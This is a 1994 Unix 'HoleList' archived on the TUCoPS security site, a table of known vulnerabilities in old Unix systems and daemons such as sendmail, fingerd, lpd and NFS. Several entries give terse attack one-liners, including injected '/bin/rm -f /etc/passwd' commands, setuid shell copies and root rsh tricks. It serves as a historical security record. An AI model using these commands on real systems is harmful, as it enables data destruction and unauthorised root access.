Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: holelist.txt

Hole Lists -- Cut to the chase, a list of known holes in UNIX. 94/12/13




From HoleList F A Q
Subject: HoleList    v7    12/13/94

    These bugs/holes are archived only as a record of security related
    activity and are for educational purposes only.  This compilation
    is not meant to encourage malicious activity and is not intended
    to be a cookbook of cracking material.

    If you know of a hole or bug that is related to security and that is
    not listed in the follow list, please contribute by sending E-Mail to
    <scott@spy.org>.

BURST-	HOLELIST

---

From: HoleList
Subject: Holes'n'Bugs
Date: 03/03/94

    These bugs/holes are archived only as a record of security related
    activity and are for educational purposes only.  This compilation
    is not meant to encourage malicious activity and is not intended
    to be a cookbook of cracking material.

    If you know of a hole or bug that is related to security and that is
    not listed in the follow list, please contribute by sending E-Mail to
    <scott@spy.org>.

Operating System RVP   Date   Description (References)
================ === ======== ================================================
/bin/sh		 1-- 12/12/94 IFS hole, vi ()
/bin/su		 1--          overwrite stack somehow? ()
/dev/fb		 1--          frame buffer devices readable/writeable, ()
/dev/kmem        1--          /dev/kmem shold not be o+w ()
/dev/mem         1--          /dev/mem shold not be o+w ()
/dev/*st*, *mt*	 1--          generally world readable/writeable ()
/etc		 1--          rexd + MACH ? [NeXT] /etc/ g+w daemon ()
4.3 Tahoe        1--          chfn -- allows newlines/meta chars/bufsize ()
4.3 Tahoe        1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:got pw ()
AIX ?		 5++          setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()
AIX 2.2.1	 1--          shadow password file o+w ()
AIX 3.1.5        5--          sendmail- mail to programs ()
AIX 3.2          5--          sendmail- mail to programs ()
AIX 3.2.4        5--          sendmail- mail to programs ()
AIX 3.2.5        5--          sendmail- mail to programs ()
AIX ?            1--          * password means use root's password? ()
AIX ?            1--          rexd- any can get root access if enabled ()
Amdahl UTS 2.0   1--          NFS mountd only uses hostname ()
AT&T SVR3.2.0    1--          Bad protected mode allows root if have sh + cc ()
A/UX 2.0.1       5--          lpr -s; 1000 calls lpr re-use fname ()
A/UX 2.0.1       5--          rdist(1) uses popen(3), IFS spoof ()
A/UX 2.0.1       5--          rdist(1) uses popen(3), IFS spoof ()
BellTech SYSV386 1--          ulimit 0; passwd  ==> zero's out passwd file ()
BSD 4.1          1--          Sendmail can mail directly to a file
BSD 4.1          1--          can mail directly to a file
BSD 4.1          1--          run set gid program, dump core, is set gid
BSD 4.1          1--          lock- compiled password "hasta la vista", + ^Z ()
BSD <4.2?        1--          IFS w. preserve bug in vi ()
BSD 4.1          1--          mail directly to a file ()
BSD 4.1          1--          exec sgid program, dump core, core is sgid ()
BSD 4.1          1--          Sendmail: can mail directly to a file ()
BSD 4.1		 1--          lock password "hasta la vista" backdoor ()
BSD <4.2         1--          IFS w/ preserve bug w/vi ()
BSD <4.2         1--          suspend mkdir, ln file you want to dir ()
BSD <4.2?        1--          suspend mkdir, ln file you want to dir ()
BSD 4.2          1--          lock -- compiled in password "hasta la vista" ()
BSD 4.2          1--          ln passwd file to mail spool, mail to file ()
BSD 4.2          1--          can truncate read only files ()
BSD 4.2          1--          finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2          1--          ln -s target ~/.plan; finger user to read file ()
BSD 4.2          1--          lpr file; rm file; ln -s /any/filename file ()
BSD 4.2          1--          adb su; change check in memory; shell out ()
BSD 4.2          1--          race condition, can get root via "at" ()
BSD 4.2          1--          lock -- compiled in password "hasta la vista"
BSD 4.2          1--          ln passwd file to mail spool, mail user ()
BSD 4.2          1--          can truncate read only files ()
BSD 4.2          1--          finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2          1--          ln -s target ~/.plan; finger user. ()
BSD 4.2          1--          lpr file; rm file; ln -s /any/filename file ()
BSD 4.2          1--          adb su; change check in memory; shell out; su ()
BSD 4.2          1--          race condition, can get root via "at" ()
BSD 4.2          1--          /dev/kmem and /dev/mem  should not be o+w ()
BSD 4.2          1--          signal any process by changing process group ()
BSD 4.3          1--          ftp -n; quote user ftp; ect.  Gets root privs. ()
BSD 4.3          1--          lpd can overwrite file ()
BSD 4.3          1--          ln -s /any/suid/file -i ; -i Get suid shell. ()
BSD 4.3          1--          fchown (2) can chown _any_ file ()
BSD 4.3          1--          race condition, get root via "at" ()
BSD 4.3          1--          passwd chokes on long lines, splits pw file ()
BSD 4.3          1--          ftp -n; quote user ftp; cd ~root, get root ()
BSD 4.3          1--          lpd can overwrite file ()
BSD 4.3          1--          ln -s /any/suid/file -i ; -i Get suid shell ()
BSD 4.3          1--          fchown (2) can chown _any_ file ()
BSD 4.3          1--          race condition (expreserve?), root via "at" ()
BSD 4.3          1--          passwd chokes on long lines, splits pw file ()
BSD 4.3          5--          lpr -s; 1000 calls lpr re-use fname ()
BSD NET/2        5--          rdist(1) uses popen(3), IFS spoof ()
BSD NET/2        5--          lpr -s; 1000 calls lpr re-use fname ()
BSD ?            1--          Overwrite gets buffer -- fingerd, etc
BSD ?            1--          uudecode alias can overwrite root/daemon files ()
BSD ?            1--          /bin/mail ; !/bin/sh    Get uid=bin shell ()
BSD ?            1--          rwall bug ()
BSD ?            1--          adb the running kernel, shell out and get root ()
BSD ?            1--          sendmail can mail non-root file, try twice ()
BSD ?            1--          rshd -- spoof via nameservice, rsh target -l uid
BSD386		 1--          mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()
buffer overrun 	 1--          chfn ()
chfn, chsh	 1--          used to create a root account ()
chmod		 1--          Incorrect file or directory permissions ()
comsat		 1--          running as root, utmp o+w, writes to files ()
core		 1--          will system dump a setgid core image? ()
decode		 1--          decode mail alias - write non-root user files ()
DellSVR3.2/1.0.6 1--          Bad prot mode allows root if have sh + cc ()
denial		 1--          easy to hog processor, memory, disc, tty, etc ()
DomainO/S <=10.3 1--          break root by using s/rbak; sgid/suid ()
DomainO/S <=10.4 5--          sendmail mail to programs ()
DNS		 1--          SOA can control bogus reverse ip, rhosts ()
Domain/OS <10.3  1--          break root by using s/rbak; setgid/uid ()
DYNIX 3.0.14     1--          Sendmail -C file  ==> displays any file. ()
DYNIX 3.?        1--          can get root on NFS host via root via mountd ()
DYNIX 3.?        1--          on non-trusted host due to bug in mount daemon ()
DYNIX ?          1--          rsh <host> -l "" <command>   runs as root ()
DYNIX ?          1--          login: -r hostname
ruser^@luser^@term^@ ()
elm              5--          ELM's autoreply can be used to get root ()
expreserve	 1--          can be a huge hole  ()
ESIX Rev. D      1--          Bad protected mode allows root if sh+cc ()
file mod test	 1--          test file doesnt lose the suid when modified ()
fsck 		 1--          lost+found should be mode 700 ()
ftpd		 1--          static passwd struct overwrite, wuftp < x.xx ()
ftpd 4.2	 1--          userid not reset properly, "user root" ()
ftpd ?		 1--          core files may contain password info ()
fchown		 1--          test for bad group test ()
ftruncate	 1--          can be used to change major/minor on devices ()
fingerd		 1--          .plan hard-links - read files, fingerd ()
gopher           6--          Type=8 Name=shell Host=;/bin/sh Port= Path= ()
gnuemacs         1--          emacsclient/server allows access to files. ()
GN <1.19         4+-          exec0::/path/prog?var=blah%0Ahack-coomands0%A ()
HDB              1--          nostrangers shell escape ()
HDB              1--          changing the owner of set uid/gid files ()
HDB              1--          meta escapes on the X command line ()
HDB              1--          ; breaks on the X line ()
hosts.equiv      1--          default + entry ()
hosts.equiv	 1--          easy to spoof by bad SOA at remote site ()
HPUX <7.0        1--          chfn -- allows newlines, etc ()
HP-UX		 1--          sendmail:  mail directly to programs ()
HPUX A.09.01	 1--          sendmail:  mail directly to programs ()
HPUX ?           1--          Sendmail: versions 1.2&13.1 sm, -oQ > ()
IDA 1.4.4.1	 1--          :include:/some/unreadable/file in ~/.forward ()
ICMP		 4--          various icmp attacks possible ()
ICMP		 1--          ICMP redirect packets change non-static routes ()
Interactive 2.x  1--          Bad protected mode allows root if sh+cc ()
IRIX 3.3         1--          any user can read any other user's mail. ()
IRIX 3.3.1       1--          any user can read any other user's mail. ()
IRIX 3.3/3.31    1--          sendmail- any user can read other user's mail ()
IRIX 4.0.X	 1--          default suid scripts ()
IRIX 4.0.X	 1--          various $PATH problems ()
IRIX 4.0.X	 1--          sendmail race condition hole ()
IRIX 4.0.X	 1--          lpd are vulnerable too ()
IRIX ?           1--          rsh <host> -l "" <command>   runs as root ()
IRIX ?           1--          login: -r hostname
ruser^@luser^@term^@ ()
IRIX ?           1--          login: -r hostname
ruser^@luser^@term^@ ()
IRIX ?           1--          Overwrite gets buffer -- fingerd, etc ()
IRIX ?           1--          uudecode alias can overwrite root/daemon files ()
IRIX ?           1--          /bin/mail ; !/bin/sh    Get uid=bin shell ()
IRIX ?           1--          rwall bug ()
IRIX ?           1--          adb the running kernel, shell out and get root ()
IRIX ?           1--          mail to any non-root owned file, try twice ()
IRIX ?           1--          rshd- spoof via dns - rsh target -l uid ()
IRIX ?           1--          xwsh log hole? (yo)
kernel		 1--          Race conditions coupled with suid programs ()
lock		 1--          4.1bsd version had password "hasta la vista" ()
lost+found	 1--          lost+found should be mode 700 ()
lpd		 1--          overwrite files with root authority ()
lpr		 1--          lpr -r access testing problem ()
lpr              5--          lpr -s; 1000 calls lpr re-use fname ()
lprm		 1--          trusts utmp ()
mount 		 1--          "mount" should not be +x for users. ()
mqueue		 1--          must not be mode 777! ()
movemail         1--          worm? ()
Microport 3.0    1--          ulimit 0; passwd  ==> zero's out passwd file ()
network          1--          BSD network security based on "reserved ports" ()
news             1--          news receivers may execute shell commands ()
network		 1--          kerberos ()
network		 1--          Networks are usually very insecure. ()
NFS		 1--          Many systems can be compromised with NFS/RPC. ()
NFS              1--          proxy rpc can read remote nfs files ()
NFS              1--          can generate NFS file handles ()
OSF/1 1.2	 1--          write allows shell outs to gain egid term ()
OSF/1 1.3	 1--          write allows shell outs to gain egid term ()
OSF/1 1.2	 1--          doesn't close the fd to the term writing to ()
OSF/1 1.3	 1--          doesn't close the fd to the term writing to ()
passwd		 1--          fgets allows entries mangled into ::0:0::: ()
passwd		 1--          fred:...:...:...:Fred ....Flintstone::/bin/sh ()
passwd		 1--          IDs shouldnt contain: ;~!` M- spoof popen ()
portmap		 1--          binding problems... ()
root		 1--          ? (fingerd_test.sh)
rcp		 1--          nobody problem ()
rexd		 1--          existence ()
rexd		 1--          MACH ? [NeXT] /etc/ g+w daemon ()
rdist		 1--          buffer overflow ()
rdist            5--          rdist(1) uses popen(3), IFS spoof ()
RISC/os 4.51?    1--          rsh <host> -l "" <command>   runs as root ()
RPC		 1--          Many systems can be compromised with NFS/RPC. ()
rwall		 1--          running as root, utmp o+w , writes to files ()
SCO 3.2v4.2      5--          rdist(1) uses popen(3), IFS spoof ()
SCO ?            1--          rlogin to any acct to trusted host w/o pwd ()
SCO ?            1--          rlogin to any acct from trusted host w/o pwd ()
selection_svc 	 1--          allowed remote access to files ()
sendmail <x.x	 1--          -bt -C/usr/spool/mail/user - reads file ()
sendmail <5.57   1--          from:<"|/bin/rm /etc/passwd">  && bounce mail ()
sendmail <=5.61  1--          can mail to any file not root owned, try twice ()
sendmail <5.61   1--          sendmail- groups incorrectly, get group ()
sendmail >5.65   1--          can get daemon privalages via .forward. ()
sendmail ?       5++          can mail to programs (sendmal1, nmh, smail)
sendmail ?       1--          debug option ()
sendmail ?       1--          wizard mode ()
sendmail ?       1--          TURN command allows mail to be stolen ()
sendmail ?       1--          decode mail alias - write non-root user files ()
sendmail ?       1--          buffer overflow cause sendmail deamon lock up ()
sendmail ?       1--          what uid does |program run with? ()
SIGNALS          1--          signal any process by changing process group ()
Stellix 2.0?     1--          rsh <host> -l "" <command>   runs as root ()
Stellix 2.0      1--          rsh <host> -l "" <command>   runs as root ()
Stellix 2.1      1--          login: -r hostname
ruser^@luser^@term^@ ()
suid             1--          will run .profile if linked to - , IFS ()
suid		 1--          never call system(3) and popen(3) ()
suid		 1--          May not expect filesize signals, SIGALRMs ()
suid		 1--          no setuid program on a mountable disk ()
suid		 1--          ro mounting of foreign disk may allow suid. ()
suid		 1--          .plan links ()
suid		 1--          /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()
SunOS 3.3	 1--          ftpd - userid not reset properly, "user root" ()
SunOS 3.5        1--          connect w/acct;user root;ls;put /tmp/f/ tmp/b ()
SunOS <4.0       1--          any user can run yp server ()
SunOS 4.0	 1--          chsh -- similar to chfn ()
SunOS 386i       1--          rm logintool, hack login with adb, chmod 2750 ()
SunOS 386i/4.01? 1--          login -n root requires no password ()
SunOS 386i/4.01? 1--          login -n root (no password) ()
SunOS 4.0.1	 1--          chfn buffer problems ()
SunOS 4.0.1	 1--          chsh buffer problems ()
SunOS 4.0.1      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3      1--          concurrent yppasswd sessions can trash yp map ()
SunOS 4.0.3      1--          mail to any non-root owned file, try twice ()
SunOS 4.0.3      1--          rcp buffer overflow ()
SunOS 4.0.3	 1--          sendmail- mail to non-root file, try twice ()
SunOS 4.0.3      1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW ()
SunOS 4.0.3      1--          uucico can show ph num, login, passwd, on remote machine ()
SunOS 4.0.3      1--          ypserv sends maps to anyone w/ domain (ypsnarf)
SunOS 4.0.?	 1--          anyone can restore a file over any other file. ()
SunOS 4.0.?	 1--          chfn -- allows newlines, meta chars, bufsize problem. ()
SunOS 4.0.?	 1--          rcp with uid -2; only from PC/NFS. ()
SunOS 4.0.?	 1--          ln -s /any/suid/file -i ; -i ()
SunOS 4.0.?	 1--          selection_svc can remotely grab files. ()
SunOS 4.1        1--          rshd: spoof via nameservice, rsh target -l uid ()
SunOS 4.1        1--          shared libs accept relative paths w/ suid ()
SunOS 4.1        1--          sendmail: groups incorrectly checked, can get any group ()
SunOS 4.1	 1--          comsat can overwrite any file ()
SunOS 4.1.x      1--          comsat can overwrite any file ()
SunOS 4.1.x      1--          ptrace allows to become root ()
SunOS 4.1.x      1--          openlook: telnet 2000; executive,x3, run ps int ()
SunOS <4.1.1     5--          lpr -s; 1000 calls lpr re-use fname ()
SunOS 4.1.2      5--          rdist(1) uses popen(3), IFS spoof ()
SunOS ?		 1--          /usr/kvm/crash allows sh escapes group kmem ()
SunOS ?		 1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW()
SunOS ?          1--          /dev/kmem and /dev/mem should not be o+w ()
SunOS ?		 1--          rshd -- spoof via nameservice, rsh target -l uid
SunOS ?		 1--          ftp -n; quote user ftp; ect.  Gets root privs. ()
SunOS ?		 1--          symlink .plan to target file, finger user to read. ()
SunOS ?		 1--          Overwrite gets buffer -- fingerd, etc.  (3.5)
SunOS ?		 1--          rwall bug (<= 4.01 yes). ()
SunOS ?		 1--          ptrace allows to become root ()
SunOS ? 	 4--          icmp errors not handled correctly ()
SunOS ?          1--          adb the running kernel, shell out and get root ()
SunOS ?          1--          ftp -n; quote user ftp; ect Gets root privs ()
SunOS ?          1--          lpd can overwrite file ()
SunOS ?          1--          the window manager can be used to read any file ()
SunOS ?          1--          rexd -- any can get root access if enabled ()
SunOS ?		 1--          emacsclient/server allows access to files ()
SunOS ?          1--          openlook; telnet port 2000; executive,x3, runs PS interp
SunUS ?		 1--          devinfo can be used to get group kmem ()
SunOS 5.1	 1--          Symlinks are broken ()
syslogd          6--          buffer overrun, allows remote access ()
syslogd		 1--          syslog messages used to overwrite any file ()
system           1--          system(3) even w/ setuid(getuid()) = IFS ()
SYSV <R4         1--          write to files; race condition w/ mkdir & ln ()
SYSV <R4         1--          expreserve problem/race condition ()
SYSV R?          1--          IFS, other environment at "login:" prompt ()
tcp/ip           1--          sequence number prediction allows spoofing ()
tcp/ip		 1--          source routing make host spoofing easier ()
tcp/ip		 1--          rip allows one to capture traffic more easily ()
tcp/ip		 4--          various icmp attacks possible ()
tftp		 1--          puts/gets -- grab files, do chroot ()
traceroute	 1--          allow one to easily dump packets onto net ()
ulimit		 1--          passwd(1) leaves passwd locked if ulimit set ()
Ultrix 2.0?      1--          sendmail- 1.2&13.1 sm, -oQ > can r/w any ()
Ultrix 2.0?      1--          Sendmail -C file  ==> displays any file. ()
Ultrix 2.2?      1--          Sendmail -C file  ==> displays any file. ()
Ultrix 2.2       1--          ln passwd file to mail spool, mail to user ()
Ultrix 2.2       1--          on a non-trusted host due to bug in mountd ()
Ultrix 2.2       1--          Sendmail: -C file  ==> displays any file ()
Ultrix 2.2       1--          can get root on NFS host via root via mountd ()
Ultrix 2.2       1--          get root on host running NFS from other root ()
Ultrix 3.0       1--          lock -- compiled in password "hasta la vista" ()
Ultrix 3.0	 1--          login -P progname allows run programs as root ()
Ultrix 3.0       1--          login can run any program with root privs ()
Ultrix 3.0       1--          ln -s target ~/.plan; finger user to access ()
Ultrix 3.0       1--          any user can mount any filesystem ()
Ultrix 3.0       1--          X11 doesn't clear pwds in mem; /dev/mem is o+w ()
Ultrix <3.1      1--          limit file 0; passwd -->zero's out passwd file ()
Ultrix <3.1      1--          lpd can overwrite any file (back to 2.0?) ()
Ultrix 3.1?      1--          rshd: spoof via nameservice, rsh target -l uid ()
Ultrix 3.1?      1--          allows newlines, meta chars, buffsize problem ()
Ultrix <4.1      1--          overflow RISC reg buffer, get root w/ mail ()
Ultrix ?         1--          rshd -- spoof via dns, rsh target -l uid ()
Ultrix ?         1--          ypbind takes ypset from all; spoof yp DB ()
Ultrix ?         1--          yppasswd leaves yp data files world writable ()
Ultrix ?         1--          chfn -- allows newlines, meta chars, bufsize ()
Ultrix ?         1--          ftp -n; quote user ftp; ect Gets root privs ()
Ultrix ?         1--          can change host name, mount any filesystem ()
Ultrix ?         1--          uudecode alias can overwrite root/daemon files ()
Ultrix ?	 4--          ICMP not handled correctly (nuke)
Ultrix ?	 1--          emacsclient/server allows access to files ()
Ultrix ?         1--          lock: password "hasta la vista" backdoor ()
Ultrix ?         1--          /dev/kmem and /dev/mem should not be o+w ()
Ultrix ?         1--          can change physical ethernet address ()
UNIX             1--          / must not be go+w ()
utmp             1--          etc/utmp o+w ? ()
utmp		 1--          check to see if world writeable (rwall, comsat)
utmp		 1--          syslog messages can overwrite any file ()
uucp		 1--          check valid UUCP akts in the /etc/ftpusers ()
uucp		 1--          echo "myhost myname">x;uucp x ~uucp/.rhosts ()
uucp             1--          uucico shows ph num, login, passwd, of remote ()
uudecode	 1--          if it is setuid, may create setuid files ()
uusend           1--          uusend may call "uux" while suid to root ()
uux              1--          uusend may call "uux" while suid to root ()
X11R?            1--          snoop on keyboards and bitmaps ()
X11R3            1--          can set log on and exec (fixed in "fix-6")
X11R4            1--          can set log on and exec (fixed in "fix-6")
X11R ?           1--          snoop on keyboards and bitmaps ()
X11R5		 5++          xterm can create files (xterm1__)
xhost		 1--          if + , anyone can connect to X server ()
ypbind		 1--          accepts ypset from anyone ()




TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH